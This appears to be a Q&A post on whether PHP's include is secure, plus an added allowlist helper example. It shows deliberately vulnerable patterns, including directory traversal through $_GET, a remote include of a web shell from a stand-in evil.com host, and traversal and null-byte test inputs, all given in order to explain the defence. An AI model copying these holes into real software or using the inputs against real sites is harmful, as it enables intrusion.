PHP - Is "include" function secure?


Question


I'm using the "include" function (e.x. "include 'header2.php'" or "include 'class.users.php'") to add the header or session class in my website. I don't really remember where, but I heard that hackers abuse, somehow, this "include" thing, sending the fake included page or something like that. So basically I would like to know what's with that "include" function, how can I protect it, how do they abuse it and if there are better solutions for what I am looking for.

Thanks in advance.

Answer


It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

Insecure (directory traversal)

<?php 
include($_GET['file']);
?>


Insecure (URL fopen - If enabled)

<?php 
include('http://evil.com/c99shell.php');
?>

Insecure

<?php 
include('./some_dir/' . $_GET['file']);
?>

Partially insecure (*.php files vulnerable)

<?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>


Secure (Though not sure why anyone would do this.)

<?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

Secure

<?php 
include('./includes/somefile.php');
?>
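As an added example (not part of the original answer), here is one way to write the "allowlist" approach from the answer as a reusable helper. The user supplies only a short key, never a file name, so there is no path to traverse and no way to point `include` at a remote URL; the helper additionally confirms with `realpath()` that the resolved file really sits under the include directory. The directory name `includes/`, the `page` query parameter and the page keys are assumptions for illustration.

```php
<?php
// Added example, not code from the original post. Directory layout, the
// `page` parameter and the keys in PAGE_MAP are assumptions for illustration.
declare(strict_types=1);

// Map user-facing keys to real file names. Because the user never supplies a
// path, inputs such as "../../etc/passwd" or "http://evil.example/x.php" can
// never reach include(); they simply are not keys in this map.
const PAGE_MAP = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

const INCLUDE_DIR = __DIR__ . '/includes';

/**
 * Resolve a page key to an absolute path inside INCLUDE_DIR.
 * Returns null when the key is not allowlisted, the file does not exist,
 * or the file resolves (e.g. via a symlink) outside INCLUDE_DIR.
 */
function resolve_include(string $key): ?string
{
    if (!array_key_exists($key, PAGE_MAP)) {
        return null;                               // not on the allowlist
    }

    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . PAGE_MAP[$key]);
    if ($base === false || $path === false) {
        return null;                               // directory or file missing
    }

    // Defence in depth: even an allowlisted entry must stay under INCLUDE_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $path;
}

// Constructed inputs: everything except a known key (with an existing file)
// yields null, i.e. is refused before include() is ever reached.
foreach (['../../etc/passwd', 'http://evil.example/shell.php', "home\0.php", 'home'] as $candidate) {
    printf("%-32s => %s\n", json_encode($candidate),
        resolve_include($candidate) === null ? 'rejected' : 'allowed');
}

// Typical use at the top level of the page (include at top level so the
// included file sees the page's variable scope).
$path = resolve_include($_GET['page'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Not found');
}
include $path;
```

Note that `include_once` and `require` behave the same way with respect to user input, so the same rule applies to them. On the `allow_url_include` point from the answer, this helper never builds a URL, so it is safe regardless of that setting; disabling `allow_url_include` in `php.ini` is still worth doing as a second layer.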
